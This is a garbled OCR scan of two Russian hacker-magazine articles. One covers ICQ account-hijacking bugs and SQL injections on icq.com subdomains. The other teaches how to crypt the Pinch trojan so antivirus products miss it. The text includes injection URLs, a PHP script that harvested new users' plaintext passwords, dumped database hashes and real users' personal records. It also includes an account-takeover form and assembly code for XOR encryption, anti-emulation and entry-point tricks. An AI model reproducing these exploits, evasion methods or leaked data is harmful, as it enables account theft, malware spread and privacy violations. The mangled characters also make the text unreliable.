СЬапдез 

Первое и самое крупное за несколько лет изменение на веб- 
страницах ісд.сот произошло в начале-середине лета 2010 года. 
Тогда полностью изменилась старая и уже давно всем полюбив- 
шаяся система ретрива пароля. 

Теперь, заходя по адресу ЫГрзУ/ісд.сот/раззѵѵогсІ . мы видим поле, 
куда просят ввести 1)1 N или мыло для подключения, и второе поле 
для ввода капчи. Собственно, в поле с вводом етаіі'а и заключает- 
ся вся соль. Отныне в ІСО нет такого понятия, как «ргітагу етаіі» 
с его многоуровневой структурой, а есть понятие «етаіі Гог Іодіп». 
Если в примари-емейлах пароль ретривился на первое введенное 
мыло, а все последующие мейлы отпадали, то в новой системе все 
совершенно иначе. 

Смотри: ты сбрутил номер, в который уже было вписано мыло для 
логина — ты вписываешь свое новое мыло, подтверждаешь его и 
все! Теперь ты — полноценный владелец обрученного номера, так 
как мыло прежнего хозяина больше не имеет никакого отношения 
к данному уину. 

Основные особенности новой системы таковы: 

1. Теперь стало возможным сделать ретрив на пятизначные номера; 

2 . Отпала возможность установки своих секретных вопросов/отве- 
тов на любой номер; 

3. Старые вопросы и ответы сохранились на всех номерах, где они 
были установлены, но изменить ты их не сможешь; 

4 . Появились пятизнаки с установленными на них секретными 
вопросами и ответами. 

В первые же недели после введения в строй новой системы стали 
пачками угоняться пятизнаки и другие красивые номера. Во всем 
виноваты базы мыл для логина, когда-то собранные асечниками. 



Так как никто и никогда не думал, что «етаіі Гог Іодіп» будут что-то 
значить в будущем, многие вписывали их «от балды» в детали номера, 
либо вписывали и забывали о них, так что появилась возможность 
регистрации неиспользуемых мыл, либо взлом уже существующих. 
Также стоит отметить еще один забавный факт: в связи с отпавшей 
возможностью изменения секретных вопросов/ответов появились 
номера, ходившие по рукам. К примеру, если ты узнал ответ на вопрос 
от номера, и если его узнал кто-то еще, то вы будете постоянно 
отбирать его друг у друга с помощью ответа на секретный вопрос :). 
Словом, одним из таких общеизвестных номеров с паблик-ответом 
является уин 555555558 с вопросом про любимый цвет и ответом 
«розовый». Также изменения коснулись и системы регистрации, 
расположенной по адресу ЫГрзТ/ісд.сот/гедігГег — теперь номер 
выдается не сразу после заполнения необходимых полей, а после 
подтверждения регистрации по мылу и логина в клиент или на сайт, 
так что авторегеры уинов также постепенно отмирают. 

Вообще, на момент написания статьи еще изменились главная 
страница ІСО.сот (теперь для русских пользователей там при- 
сутствовала лишь ссылка на загрузку официального клиента и 
невнятный дизайн) и страница поиска зеагсб. ісд.сот (для русских 
пользователей отныне там был встроен поисковик от таіі.ги ]. плюс, 
при заходе на страницу ЫГрУ/ѵѵѵѵѵѵ.ісд.сот/ѵѵіГ/ мы сможем увидеть 
старых добрых Одноклассников :). 

Новые времена — 
новые бсіги 

Практически сразу после введения новой системы ретрива обнару- 
жился первый хоть сколько-нибудь значимый баг на страницах ісд. 
сот . 
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Прекращение партнерства ІСО с АВѴ.Ьд 



Баг заключался в том, что любому желающему могло 
стать известным мыло от любого локализованного 
номера ІСО. 

Принцип действия баги был таков: 

1. Заходим на ЫірзѴ/ісд. т/раззѵѵогсі . вводим любой 
локализованный номер и давим на сабмит; 

2 . После сабмита для восстановления пароля нам 
предлагалось перейти на страницу партнера или 
нажать ссылку «сііск беге»; 

3. Не переходя на страницу партнера, копируем ссылку 
«сііск беге» и меняем ее параметры следующим обра- 
зом: 



было : ЬВСрз : / /шш . ісд . сот/раз зѵ\гогс1/ іогт/ 
хѵеЪ?іогт_куре=дпа&іс1=1&зп=ХХХ&зБюѵ\г=1 
стало : БШкрз : / /шяѵі . ісд. сот/раззчлгогсі/ іогт/ 
ілеЬ?іогт_Цуре=дпа&іб=2&зп=ХХХ&збюѵ^=1 

После таких нехитрых манипуляций система выдава- 
ла нам сообщение о том, что письмо со ссылкой для 
восстановления пароля успешно отправлено на мейл 
«таіІйраііпеМсд.сот». Данный баг прожил довольно 
продолжительное время, знающими людьми сразу же 
были просканены целые диапазоны уинов и составле- 
ны списки приаттаченных к ним мейлов. 

Здесь же следует отметить инцидент, также произо- 
шедший летом 2010 года. Тогда неизвестными злоу- 
мышленниками с помощью манипуляций со ссылками 
ретрива (предположительно) было уведено большин- 
ство локализованных пятизнаков. Последствия этого 
инцидента проявляются до сих пор в виде падения 
цен на красивые номера и нежелания юзеров покупать 
уины с локализацией. 

Стоит также отметить, что локализация номеров ІСО 
стала постепенно отмирать: 

1. Болгарский портал АВѴ.Ьд — больше не партнер ІСО; 

2 . Нельзя аттачить номер и изменять пароль на номере 
с помощью Відтіг.ІЧеІ; 

3. Довольно продолжительное время нельзя регистри- 
ровать номера на Рамблере, хотя аттач и смена пароля 
работают вполне успешно; 

4 . Ѵапбех также больше не является партнером ІСО; 

5 . Нельзя больше регистрировать номера с помощью 
АНаз.зк, МуІЧеБсот, ІЧапа.со.іІ и некоторых других 
бывших и нынешних партнеров. 

Дырявый ІСО.СОШ 

Если ты помнишь античатовский топик почти трехгодо- 
валой давности ( ЫірзѴЛогит.апІісЬаБги/зЬоѵѵІІігеасЕ 
рбр?р=626441 ] о наличии ЗОБ-инъекции на страницах 
поддомена дгееііпдз.ісд.сот, то, наверное, думаешь, 
что и по сей день асечные веб-сервисы работают на 
«5ѴВА5Е АЗЕ 15.0.1». Спешу тебя разуверить в этом :). 

С приходом Б5Т (или «Маіі.ги дгоир» после переиме- 
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БОЬинъекция на Ыодз.ісд.сот 



нования) веб-паги ІСО. сот стали работать на обычном 
Мускуле (тздЬоагб_и_гоЮ64.1 2.1 64.91 — пользователь, 
тздЬоагб — база данных, 5. 1 .45- Іод — версия)! 
Информацию о новой скуле (на этот раз на страницах 
поддомена Ыодз.ісд.сот) 17 октября 2010 года опубли- 
ковал 500рѴ на портале Зпіррег.Ри. 

После небольшого расследования и с разрешения 
автора скули я опубликовал подробную информацию, 
полученную с помощью данной скули (ссылку на пер- 
воисточник ищи в сносках). Сама инъекция выглядела 
следующим образом: 

ЬВВр : //Ыодз . ісд. сош/Ыодз/Ыод/ 

Сад/ 4 0 642 8869-99999+ипіоп+зе1еск+1 , сопсак (из 
ег , 0х3а,раззтлгогсі) , 3 + ігош+туздІ .изег-- + 

А вот и все юзеры с их паролями из таблицы тузді. 
изег: 



ІосаІЬозВ :гооВ : *ВЗА0Е433Е7АВ0Р00794196РЗС293 
1СВ66АА89796 

% :шздЬоагсі_и_г^: *7РВВ912Е113СР606Е410Р18С967 
487СЕ935АСРАС 

% : зсоиВ : *9РВ2В525560 651633 0882 6С11ВВ588А6РЗ 
Р2ЕВ9Е 

% :гері : *9 0414724СВРРРЕ7В4 88063 1В5Е9Е7232 
С4737680 

% :тусіЬт: *А9С391720ВСЗВ218СВ5ЕРЕВРЕВВ8С55602 
ЕРЕ2РЕ 

% .аоі .сопиОзВОЬт: *4В93ВС0Е9Е6РС017216В7ВЕ4В4 
9ВС77ВЕЕ4Е9ЕВЕ 

ІосаІЬозВ :йзВ(ІЬт: *4В93ВС0Е9Е6РС017216В7ВЕ4В4 
9ВС77ВЕЕ4Е9ЕВЕ 

% :ріпд: *75Е75А54ЕІСР941С40965РВЗС39ВІ937910 
2В07В 

% :агдиз : *Р5А7В854Е9С46784С82ЕРС0ВАЕ973Р6170 
ЗА7224 

% : поссЗЬа : *2В48ВР42А42234ВВВСАВВРА0Р94С9ЕВ46 
0ВВ1567 

% :герскеск: *В58082АС1А96В8580Р82 8Е2С73 0А4Е9 
1А26ВЕЗВ0 

% :шздЬоагсі_и_го: *Р1В9Е0Р8627Е5АВ39СР98ВРС58Е 
344СР4ССАСАВ4 

ІосаІЬозВ : герскеск: *В58082АС1А96В8580Р828Е2С 
73 0А4Е91А2 6ВЕЗВ0 

ісдмеЪтзс1Ъ-с105 . сІЪ. аоі . сот: герскеск: *В58082АС 
1А96В8580Р82 8Е2С73 0А4Е9ІА2 6ВЕЗВ0 



гчГЬіі 



Р НТТР://ѴУШѴ 



> Ііпкз 

• ЬВрУЛогит. 
агесЬка.ги — здесь 
ты сможешь 
отследить историю 
всех описанных 
багов. 

• ЬкрѴ/ѵѵѵѵѵѵ.ісд.сот/ 
еп.ЫтІ — «старая» 
главная страница 
ІСО. сот. 

• ЫірѴ/зпіррег.ги/ 
ѵіеѵу/23/здІ-іпексіуа- 
па-Ыодзісдсот/ — 
ЗОБ-инъекция 

на Ыодз.ісд.сот. 

• ЫірѴ/зпір- 
рег.ги/ѵіеѵѵ/27/ 
ѵогѵгазЬЬепіе- 
идпапподо-потега- 
ісд/ — возвращение 
угнанного номера 
ІСО. 

• ЫірУАл/ѵѵѵѵ.гпз- 
рсІБІопсІопзІоск- 
ехсбапде.сот/ 
гпз/7389Ѵ 
-2010-1 1 -5.рск - 
пресс-релиз БЗТ 
в связи с выходом 
на ІРО. 

• ЫірѴ/гиззіа. 
Ыод.пітЬигг. 
сот/2010/1 1/09/ 
ісд-пе-гаЬоІаеІ-ѵ- 
пітЬ ии — отказ 
от поддержки ІСО 

в клиенте ІЧітЬигг. 
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ЗСИ-инъекция на ісд.сот/дгееНпдз 
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Новая система ретрива 



Самая интересная и важная для меня информация скрывалась в 
таблице тздЬоагб.Ізрз^Ь, содержащей номера («Вазіс бізІгіЬибоп 
Ю» в ОІР'е) и имена всех локализованных и рекламных партнеров 
ІСО.сопп, в списке также содержался и наш любимый ѲатеІ_апсІ с 
их проектом I СО Іѵ :). 

21;Ѵ7а11а 
22 ;НР 

23;РгозіеЬеп Аизігіа 
24 ; ЦеСіх 

25;КатЫег Сепегіс 
2б;Відтіг Веіагиз 
27;Сепігит С2 
2 8 ; СатеЬапсІ 

2 9 ; 81ІР 

3 0 ; Ри1з4 

3 1 ; СепВгит ЗК 
32 ; Уапсіех 

Не прошло и дня после публикации, как новость о данной уяз- 
вимости разнеслась по всему интернету, так что вскоре сервис 
Ыодз.ісд.сопп оказался отключенным для проведения техниче- 
ских работ, а затем все заработало, но уже без описанной 501- 
инъекции :). 

Продолжение истории о скулях 

2010 год был крайне богатым на ІСО-баги, так что ты не удивишь- 
ся, что вскоре после прикрытия бага на Ыодз.ісд.сопп я начал 
просматривать страницы асечных сервисов на предмет повторе- 
ния вышеописанной скули. Совсем скоро мои поиски увенчались 
успехом :). Аналогичная 501-инъекция была обнаружена по сле- 
дующему адресу: 

ЪЪСр : //ѵла т. ісд. сот/дгееііпдз/сагс1з/-1111+ипіоп+зе1есЦ 
+ 1 , сопсаС (изег ( ) , 0x3 а , ѵегзіоп ( ) , 0x3 а , сІаСаЪазе ( ) ) , 3 , 4 , 
5,6, 7+ігот+тузд1 . изег+1ішіЦ + 0 , 1 + --/зепс1/ 

Сравни с древней скупей: 

ЦЦЦр : //дгееСіпдз . ісд. сот/дгееСіпдз/сагс1з/-253 ипіоп 




Новая главная страница ІСОхот 



# іса ЗеагсН 



Найти 



Поиск от МаіІ.ги на ІСО.сот 

зеіеср пиіі , @ ©ѵегзіоп, пиіі , пиіі ,пи11 , пиіі , пиіі , пиіі 
, 1 , пиіі , пиіі , пиіі , пиіі , пиіі , пиіі , пиіі , пиіі , пиіі , пиі 
1 --/ 

Юзер и права были такими же, как в Ыодз.ісд.сопп, но на этот раз 
я решил покопать немного глубже. 

Итак, самый главный профит на этот раз заключался в таблице 
гедіз1та1:іоп_1:еппр, в которой содержались следующие поля: 

гедзВг_іс! 

гедзРг_огідіп 

гедзРг_іпаше 

гедзРг_1паше 

гедзРг_ешаі1 

гедзВг_раззѵ\югс! 

гедзВг_Ьс1а1іе 

гедзіг_диезЦіоп 

гедзРг_апзѵ^ег 

гедзРг_піскпаше 

гедзРг_1зр 

гедзРг_гед_(іаЦе 

Немного поизучав природу появления новых записей в данной 
таблице, я понял, что сюда сразу же заносятся юзеры, зарегистри- 
рованные через ісд.сот/гедізіег и пока что не прошедшие вали- 
дацию! То есть, если пользователь только что зарегистрировался 
и не успел нажать на ссылку подтверждения в своем почтовом 
ящике, любой сможет узнать его данные, тем более пароль хра- 
нился в базе в открытом виде! Недолго думая, я написал простой 
скрипт, принцип действия которого заключался в следующем: 

1. Входим в бесконечный цикл; 

2. Берем количество записей в таблице гедіз1та1:іоп_1:етр; 

3. В соответствии с полученным количеством сохраняем в тексто- 
вый файл данные последнего зарегистрированного пользователя. 
Примерное содержимое скрипта: 

<?рЬр 

тлгіііе ( 1 ) 

{ 

$а = зепсі_с1аЦа ( ' СЕТ ' , ' ЦЦЦр : / /шт . ісд . сот/ 
дгееііпдз/сагс1з/-1111+ипіоп+зе1есЦ+1 , соипі (гедзіг_ 
ісі) , 3 , 4 , 5 , 6 , 7 + ігот+гедізЦгаііоп_Ьетр+--/зепс1/ ' ) ; 

$соипі = ргед_гер1асе ( ' © . +іс!= " сагс!_ЬіЦІе " 
ѵа1ие= " ( [ А " ] + ) " . +©із ' , ' $1 ' , $а) ; 

$а = зепсі_с1аЦа ( ' СЕТ ' , ' Ъ.ЪЪр : / /тт. ісд . сот/ 
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База данных неподтвержденных регистраций на ІСО. 
сот 




дгеекіпдз/сагс1з/-1111+ипіоп+зе1есЦ + 1 , сопсак (гедзкг_ 

Ій, 0x3а, гедзкг_огідіп , 0x3а, гедзкг_і:пате , 0x3а, гедзкг_ 

Іпаше , 0x3а , гедзкг_етаі1 , 0x3а , гедзкг_ 

раззчлгагсі, 0x3а, гедзкг_Ъс1аке , 0х3а,гедзкг_ 

диезкіоп , 0x3а , гедзкг_апзмег , 0x3а , гедзкг_ 

піскпате , 0x3а , гедзкг_1зр , 0x3а , гедзкг_гед_с!аке) ,3,4,5, 

6 , 7+ігот+гедізкгакіоп_кетр+1ітік+ 1 . ($соипк-1) . ' ,1 + --/ 

зепсі/ ' ) ; 

$1од = ргед_гер1асе ( ' @ . +іс!= " сагсЦЫШе " 
ѵа1ие= " ( [ л " ] + ) " . +@із ' , ' $1 ' , $а) ; 

Іоддег ( $1од) ; 

} 



?> 

С помощью данного скрипта можно было составить базу поль- 
зователей тети Аси за определенный период, что, собственно, и 
было сделано :). Вот лишь небольшая часть данной базы: 

12495211:1: Зашіга . : хЗ : с!асііс1ихЗЗ@меЪ . 

сіе :рискііпд2 : 1992-12-04 00 : 00 : 00 : : : Затіга . хЗ:0:2010- 
11-15 12:30:53 

12495219 : 1 : Іѵо : Сескоѵзкі : зіогз_іѵо@аЪѵ . 

Ьд:а1Ь2сЗсі4: 19 85-03-27 00 : 00 : 00 : : : Іѵо 
Сескоѵзкі : 0 : 2 010-11-15 12:30:55 
12495225:1 :Мас11еп: ЗсЪѵгатт, :Мас11епзс]імаг2 85@ 
тлгеЪ . сіе : Ьіег85 :1985-02-05 00:00:00:: :Мас11еп 
Зсішатт. :100б:2010-11-15 12:30:58 
12495235 : 0 : Бі : Кагпаѵаіа : сИ_розЬ@пхк . 
ги : 3 4 5 5 б 2 і ѵ :1987-04-24 00:00:00: : : Бі 
Кагпаѵаіа : -2 : 2 010-11-15 12:31:00 
12495247 : 1 : Неііочлг : КіРРу : кізка999 -85@уапс1ех . 
ги : 3 8 9 1 б 2 аа :1985-05-12 00:00:00: : :Не11оот 
Кікку :3 :2010-11-15 12:31:03 

Возвращение блудной Аси 

Теперь настало время рассказать тебе о небольшой недоработке 
веб-девелоперов ІСО. сопл. 

По дефолту приаттачить новый мейл к своему номеру можно лишь 
через страничку бирзУМѵѵѵѵ.ісд.сот/гедізІег/етаіІ аНасЬ.рЬр 




Одноклассники.ру на іся.сот/ѵѵіі 



(при этом надо быть залогиненным через ЬирзУАллллл/.ісд.сот/ 
кагта/іодіп раде.рбр и знать текущий пароль). Всем известен тот 
факт, что логин-сессия на ІСО. сот длится неопределенно долгое 
время, так что если у тебя угнали асю и изменили на ней пароль, 
ты можешь быть залогиненным на асечном сайте, но не иметь 
возможности как-либо повлиять на угнанный номер. 

С радостью сообщаю тебе, что теперь ты сможешь вернуть свой 
любимый номерок :). Расскажу обо всем по порядку. 

Итак, новая система ретрива вводилась два раза: 

• первый раз, одновременно с введением новой системы, появи- 
лась возможность вписывать свое мыло в детали номера через 
страничку ЬирѴ/ѵѵѵѵѵѵ.ісд.сот/реорІе/НОМЕР/есІіІ:/ [а не через 
ЬирзУА/ѵѵѵѵѵ.ісд.сот/гедізІег/етаіІ аНасЬ.рбр ). при этом тебе 
всего лишь нужно было быть залогиненным на асечном сайте; 

• второй раз, после первых тестов, новую систему убрали и вре- 
менно вернули старую. После повторного введения новой систе- 
мы ретрива мыло для логина вновь менялось лишь на странице 
ЬирзУА/ѵѵѵѵѵ.ісд.сот/гедізІег/етаіІ аНасЬ.рЬр . 

После финального включения новой системы ретрива разработ- 
чики зачем-то решили оставить возможность прикрепления ново- 
го мыла с помощью первого варианта, но спрятали эту возмож- 
ность глубоко в Ыті-сорцах своих страниц :). 

Если у тебя угнали асю, твой алгоритм должен быть следующим 
(предварительно ты должен иметь живую сессию на ІСО. сот): 

1. Сохрани на свой жесткий диск следующую Ыті-страницу: 

<Іогш аскіоп= "Ь.ЦЦр : //ісд . сош/реор1е/іпс1исіе/хЬ.г . ркр " 
теЫюсі= " РОЗТ " > 

<іприк пате=" і" ѵа1ие= " гезепбМаіІ " /><Ъг/> 

<іприк пате="е" ѵа1ие= " твое_мыло@мыло . ги" /><Ъг/> 
<іприк пате=" Іапд" ѵа1ие= " еп" /><Ьг/> 

<іприк пате= " зегѵег " ѵа1ие= "ргосі" /><Ьг/> 

<іприк Буре= " зиЬтіБ " ѵа1ие= " ок" /><Ьг/> 

</ іогт> 

2 . Открывай данную страницу в браузере и жми на сабмит; 

3. После сабмита на твое вписанное мыло упадет ссылка для под- 
тверждения нового «етаіі Іюг Іодіп»; 

4 . Переходи по данной ссылке и восстанавливай пароль на новое 
мыло с помощью ЬирзѴ/ісд.сот/раззѵѵогб :). 

Подробности, а также автоматизированный скрипт для всего этого 
ты сможешь увидеть по ссылке в сносках. 

Злоключение 

В заключение хочу сказать, что основная вина за происходящие 
беспорядки в мире ІСО лежит отнюдь не на хакерах. В глупейших 
багах своих же сервисов виноваты веб-девелоперы, работающие 
в ІСО, профессионализм которых неоднократно был подставлен 
под сомнение многочисленным сообществом асечников. Также 
не могу не отметить тот факт, что не только веб-девелоперы не 
знают об элементарных правилах безопасности — абсолютное 
большинство так называемых «админов», сидящих на пятизнаках, 
подвержены самому главному багу, для которого еще не придума- 
ли патча. Имя сему багу — социальная инженерия. Но об этом я 
расскажу в другой раз \}.ло 
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взлом 



еонид "Сгйѵѵіег" Исупов сгаѵѵіеггахакер.ги 




УЧИМСЯ 

КРИПТОВАТЬ 

Профессиональные 
приемы обхода 
антивирусов 

* Многие вирусмейкеры обращаются к платным услугам «приватных 
крипторов», которые на деле оказываются весьма сомнительными 
поделками, не способными обеспечить даже минимальной защиты от 
механизмов таіѵѵаге-детекта. А ведь защитить злой код от 
обнаружения назойливыми антивирусами можно и самостоятельно, 



Один из главных инструментов исследователя вирусов — вир- 
туальная машина ѴМѴѴаге с установленной ѴѴіпсІоѵѵз ХР (данное 
требование необязательно, однако очень желательно не экспери- 
ментировать с вредоносным ПО на собственной машине). Кроме 
прочего, нам понадобятся отладчик ОИуйЬд, редактор ѴѴіпНех, 
утилита для работы с РЕ-файлами І_огсІРЕ. Ну и, разумеется, 
ѵігизіоіаі.сот для тестов. Да, там сидят аналитики, и пользоваться 
услугами этого сайта для создания «невидимого» вируса — сущее 
безумие, однако в наши планы не входит нарушение закона. Мы — 
исследователи, поэтому пусть высоколобые реверсеры копаются в 



причем абсолютно бесплатно. 



Подготовка к исследованиям 

Перед тем, как приступить к работе, давай определимся с арсе- 
налом инструментов. Во-первых, криптовать будем давным-давно 
известный всем антивирусам Ріпсб (я намерено выбрал именно 
этот троян для исследований, поскольку билдеры для его построе- 
ния и описание его конфигурации легко найти в Сети). В статье 
я опущу моменты, связанные с генерацией тела программы и 
созданием веб-админки для проверки работоспособности пинча 
(все необходимое для экспериментов, в том числе и руководства, 
ты можешь найти в зашифрованном РАР-архиве на нашем ОѴО). 
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Собственный обработчик исключений — хороший 
способ запудрить «мозг» эвристическим алгоритмам 

нашем коде на здоровье и работают над улучшением собственных 
продуктов. Остальное — по вкусу и в зависимости отличных пред- 
почтений. Итак, задраиваем люки и погружаемся в отладку. Будет 
интересно! 

Прячем код 

Сначала обратимся к тривиальным и давно известным нам методам 
сокрытия кода — шифровке секции по константе. В своих статьях 
я уже не раз обращался к подобному коду. Удивительно, но про- 
стой ХОР машинных кодов, находящихся в секции кода, позволяет 
избавиться от внимания аж четверти антивирусных программ! Итак, 
откроем сгенерированный файл пинча (ріпсб.ехе) в отладчике. 

Точка входа по умолчанию равна 1314781 0. По адресу 13147С26 
начинается поле сплошных нулей, оставленное компилятором для 
выравнивания секции. Нам это на руку — здесь мы будем разме- 
щать наш код. Итак, взгляни на вид криптора: 



13147С30 


РБЗНАБ 


13147С31 


МОѴ 


ЕСХ , 6С2Е 


13147С36 


МОѴ 


ЕБХ , БѴЮЕБ РТЕ БЗ : [ЕСХ+13 1410 0 0 ] 


13147СЗС 


ХОЕ 


ЕБХ , 7 б 


13147СЗЕ 


МОѴ 


БШЕБ РТЕ БЗ : [ЕСХ+13141000 ] , ЕБХ 


13147С45 


БООРБ ЗНОЕТ ріпс]т_ра. 13147С36 


13147С47 


РОРАБ 


13147С48 


БМР 


ЗНОЕТ ріпс1т_ра. 13147810 



Вносим изменения в файл программы (меню правой кнопки мыши, 
«сору Іо ехесиІаЫе-аІІ тосіібсабопз», в появившемся окне выбери 
из меню правой кнопки пункт «5аѵе !ііе»). После того, как измене- 
ния внесены, идем в БогсІРЕ, изменяем точку входа в программу 
на новую (новое значение ОЕР равно 13147С30, именно здесь и 
обосновался наш код) и сохраняем программу. Но и это еще не все; 
снова открываем программу в ОНуйбд, выполняем код, внесенный 
нами (для этого ты можешь установить точку останова по адресу 
13147С48 и выполнить программу, нажав 5Ы1 : 1:+Б9). Таким образом, 
наш набор инструкций шифрует 6С2Е байт. Теперь программу необ- 
ходимо снова сохранить. Готово! Мы получили вполне работоспо- 
собный зашифрованный пинч. Идем на ѵігизіоіаі.сот . загружаем 
файл и дожидаемся результатов анализа. Удивительно, но только 31 
из 43 антивирусов распознали вредоносный код (на незашифрован- 
ный пинч «ругаются» почти все — 42 из 43)! Двигаемся дальше. 
Продолжим наш эксперимент. Попробуем использовать меха- 
низм создания собственного обработчика исключений для 
выполнения одного из приемов, описанных мной на страницах 
журнала ранее. Поскольку метод «разжеван», мы лишь адапти- 
руем код для нашего случая, его функциональность полностью 
раскрывается в комментариях (если что-то все-таки осталось 
неясным, отправляю тебя к рубрике «Антиотладочные приемы» 
за октябрь 2009 года). 




Простенький код отсекает множество антивирусов 

13147С4В ХОК Е АХ , Е АХ ; обнуляем регистр 

13147С4Б РБЗН ріпсЬ_ра . 13147С62 ; помещение адреса 

нового обработчика в стек 

13 147С52 РБЗН БШЕБ РТК ЕЗ : [ Е АХ] ; помещение адреса 
старого обработчика в стек 

13 147С55 МОѴ ШО КБ РТК ЕЗ : [ЕАХ] , ЕЗР; помещение в 
ЕЗ : [0] указателя на структуру 

13147С58 САЬЪ ріпсЬ_ра . 13147С58 ; генерация исключения 
путем переполнения стека 

13147С5Б БМР ріпс1і_ра . 13145555 ; данная инструкция 
никогда не будет исполнена 

13147С62 РОР ЕАХ; восстановление регистров 
13 147С63 РОР ЕАХ 
13 147С64 РОР ЕЗР 

13147С65 БМР ріпс1і_ра . 13147810 ; переход к выполнению 
программы 

Кратко описать функционал кода можно следующим образом: мы 
создаем новый обработчик исключений и размещаем его по адресу 
13147С62. Эмуляторы кода, которые неспособны должным образом 
определить логику выполнения программы, полагают, что вслед за 
бесконечной рекурсией по адресу 13147С58 произойдет передача 
управления на следующую инструкцию ДІМР ріпсГі_ра . 13145555), 
в результате чего направляют дальнейшее исследование логики 
выполнения кода по неверному пути. На самом же деле, стек пере- 
полняется, вызывается исключение, а программа благополучно 
продолжает свою работу. Действуя таким образом, мы отметаем еще 
четыре антивируса (только 27 из 43 утилит справились с задачей и 
распознали вредоносный код). 

Итак, мы отправили на прогулку лесом едва ли не половину антиви- 
русов — что же дальше? Теперь мы займемся более изощренными 
способами антиотладки и простейшей антиэмуляции. 

Продолжаем эксперимент 

Возможно, многим покажется, что описанного выше уже достаточно, 
чтобы успешно распространять троянские программы, ведь шансы 
быть обнаруженными мы сократили вдвое. Это верно, однако мы 
отсекли лишь самые убогие антивирусы, которые совершенно не 
отвечают требованиям времени. В ходе экспериментов я выяснил, 
что и с мощной эмуляцией кода можно справиться, причем доста- 
точно легко! 

Для разминки, вставим в подопытный пинч несколько небольших 
кусков кода, которые «закроют глаза» нескольким антивирусам (а 
заодно и многим реверсерам низкой квалификации). По адресу 
13147С90 я разместил криптор, аналогичный вышеописанному, 
который шифрует написанный нами антиотладочный код (4СЬ байт, 
начиная с адреса 13147С30). На диске ты найдешь его код, здесь же 
его привести не позволяет объем статьи. Таким образом, мы скрыли 
от некоторых эвристических механизмов некоторые детали нашего 
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механизма, усложнив работу необходимостью многоступенчатой 
распаковки. 

13147С90 - БЕМ ОЕР 
ІепдВЬ 01 сосіе 4с 
13147с30 - зіагі оі сосіе 
13147с7с - еп<5. оі сосіе 

13147С90 60 

13147С91 В9 4С000000 

13147С96 8В91 3 07С1413 

БЗ: [ЕСХ+13 147СЗ 0 ] 

13147С9С 83Е2 54 

13147С9Е 8991 307С1413 

БЗ: [ЕСХ+13 14 7СЗ 0 ] , ЕБХ 
13147СА5 А Е2 ЕЕ 

касіаЬга_. 13147С96 
13147СА7 61 

Пітѵр 13147с30 

Существует очень любопытный прием, который дает очень хороший 
эффект, вводящий в ступор некоторые отладчики и антивирусы. 

Имя ему — обнуление точки входа. Действительно, совсем неправ- 
доподобной выглядит ситуация, когда РЕ-заголовок, располагаю- 
щийся по нулевому смещению относительно ІтадеВазе, является 
одновременно исполняемым кодом. Однако она более чем возмож- 
на. Открой отлаживаемый файл в ѴѴіпНех и взгляни на байты дан- 
ных, располагающиеся в самом начале файла: 5А 00 00 (да-да, 

это та самая буквенная сигнатура «М2», расположенная в начале 
РЕ-файла!). Взглянув на этот же РЕ-заголовок в отладчике (для 
этого нужно перейти по адресу 131400006), мы увидим следующую 
ка ртину: 



13140000 


4Б 


БЕС 


ЕВР 








13140001 


5А 


РОР 


ЕБХ 








13140002 


0000 


АББ 


ВУТЕ 


РТЕ 


БЗ: 


[ЕАХ] ,АБ 


13140004 


0100 


АББ 


БШОЕБ 


РТЕ 


БЗ 


: [ЕАХ] , ЕАХ 


13140028 


0000 


АББ 


ВУТЕ 


РТЕ 


БЗ: 


[ЕАХ] ,АБ 



Кажется, первые две инструкции вполне безобидны и могут быть 
выполнены без риска «уронить» программу. К сожалению, сле- 
дом за ними располагается лишь два нулевых байта, а испортить 
М2-заголовок, записав межсегментный пятибайтный переход на 
антиотладочный код, мы не можем. Подумав с полминуты, можно 
найти верное решение. Взгляни на 13140028. Здесь можно найти 



гораздо больше пяти нулевых байт. Слон здесь вряд ли поместит- 
ся, но длинный переход — вполне! Итак, действуем следующим 
образом: меняем нулевые байты, начиная с адреса 13140002, на 
следующую инструкцию: 

13140002 ЕВ 24 БМР ЗНОЕТ 13140028 

а байты, расположенные по адресу 13140028, на следующий код: 

13140028 -Е9 637С0000 БМР 13147с90 

После выполненных процедур остается лишь сохранить про- 
грамму, открыть ее на редактирование в І_огсІРЕ и обнулить поле 
«ЕпІгуРоіпІ». Итак, все работает, и еще два антивируса сдались: 
теперь лишь 25 из 43 находят в нашем подопытном образце опас- 
ный код. 

Исследования показали, что пинч содержит четыре секции, две 
из которых — .сопі 1 и .баіа — содержат данные, которые могут быть 
рассмотрены антивирусами в качестве константы и занесены в сиг- 
натурную базу. Поэтому необходимо зашифровать и их. 

Для этого полностью убираем код раскриптовки, заменяя его в 
ОКуйбд на нули, и видим, что наш образец все равно палится 
как пинч! Делаем вывод, что либо антивирусы методом пере- 
бора видят наш код, либо проверяют іппаде базе. Пробуем 
изменить Іппаде базе — и, действительно, отметаем еще четыре 
антивируса. 

І.05І іп Пте, иди Ог. ѴѴеЬ, 
не считающий время 

Представь ситуацию: мы располагаем тысячей программ, каждая 
из которых использует 15-секундный таймер. Суммарное время 
задержки выполнения кода составит, что несложно подсчитать, 
15000 секунд, или около четырех часов. Таким образом, если анти- 
вирусный алгоритм в своей работе по-настоящему эмулирует тай- 
мер, анализ тысячи подобных файлов займет у него вышеуказанное 
время. Конечно, реальная эмуляция таймеров — нонсенс, и многие 
алгоритмы просто-напросто нужным образом изменяют регистры 
или стек контекста процесса, если встречают одну из АРІ-функций, 
выполняющих задержку выполнения программы. Но все ли анти- 
вирусы настолько хороши? Проверим на практике. 

Попробуем использовать таймер в своих целях, чтобы сравнять 
с землей эмуляцию кода. Итак, наш план — использовать два 
замера времени, в промежутке между которыми будет «тикать» 
таймер. Впоследствии мы используем два временных штампа, 
чтобы вычислить разность между ними. Разность эта в даль- 
нейшем будет нами использоваться для того, чтобы изменить 
логику работы защитного механизма. Для того, чтобы засечь 
время, используем АРІ-функцию ѲеД_осаГПте, которая запи- 



РБЗНАБ 

МОѴ ЕСХ , 4С 

МОѴ ЕБХ , БЖЖБ РТЕ 

ХОК ЕБХ, 54 
МОѴ ШОКБ РТЕ 

БООРБ ЗНОЕТ 

РОРАБ 



► обо 
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Встроенный таймер, убивающий эвристику даже 
Ог. ѴѴеЬ'а 



сывает по указанному в стеке адресу следующую 16-байтную 
структуру: 

БуребеГ зБгисБ _5УЗТЕМТІМЕ { 



ЖЕБ 


ѵ^Уеаг ; 


// 


Год 


ЖЖБ 


члМопБЬ. ; 


// 


Месяц 


ЖЕБ 


ЖауОШеек; 


// 


День недели 


ЖЖБ 


вдБау ; 


// 


День месяца 


ЖЕБ 


вдНоиг ; 


// 


Часы 


ЖЕБ 


члМіпиБе; 


// 


Минуты 


ЖЕБ 
